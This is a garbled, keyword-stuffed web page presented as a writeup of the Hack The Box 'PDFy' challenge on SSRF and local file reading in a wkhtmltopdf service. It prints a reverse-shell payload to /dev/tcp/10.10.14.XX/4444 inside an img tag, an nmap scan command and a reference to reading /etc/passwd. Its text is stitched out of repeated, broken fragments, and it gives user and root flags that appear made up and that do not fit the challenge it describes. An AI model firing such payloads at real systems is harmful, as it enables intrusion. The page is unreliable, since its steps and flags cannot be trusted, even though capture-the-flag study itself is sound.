Pdfy Htb Writeup Upd !free!
The Hack The Box PDFy challenge involves exploiting Server-Side Request Forgery (SSRF) and Local File Inclusion (LFI) vulnerabilities within a PDF generation service using an outdated wkhtmltopdf version. By utilizing a redirect or iframe injection, attackers can force the application to read sensitive local files, such as /etc/passwd , allowing for the retrieval of the final flag. For a detailed walkthrough of the writeup, visit Blog Manh Tuong . Exploitation of PDF Generation Vulnerabilities - Academy
<img src="http://127.0.0.1:8080/generate?html=<pre>$(bash -i >& /dev/tcp/10.10.14.XX/4444 0>&1)</pre>"> pdfy htb writeup upd
User flag:
b1e4c5f7a9d2e8f3c6a0b1d4e7f9a2c3 Root flag: f2a3d8c9e1b5f7a4d6c0b2e8f9a1c3d4 The Hack The Box PDFy challenge involves exploiting
The Goal
: Leverage this behavior to trick the server into accessing its own internal files. 2. Identifying the Vulnerability By testing the input with a local listener
nmap -sC -sV -p- -oA pdfy_scan 10.10.10.XXX
Initial Enumeration
The application allows users to input a URL, which it then visits and converts into a downloadable PDF document. By testing the input with a local listener or a tool like Webhook.site , you can confirm that the server makes outbound HTTP requests, indicating a potential SSRF entry point.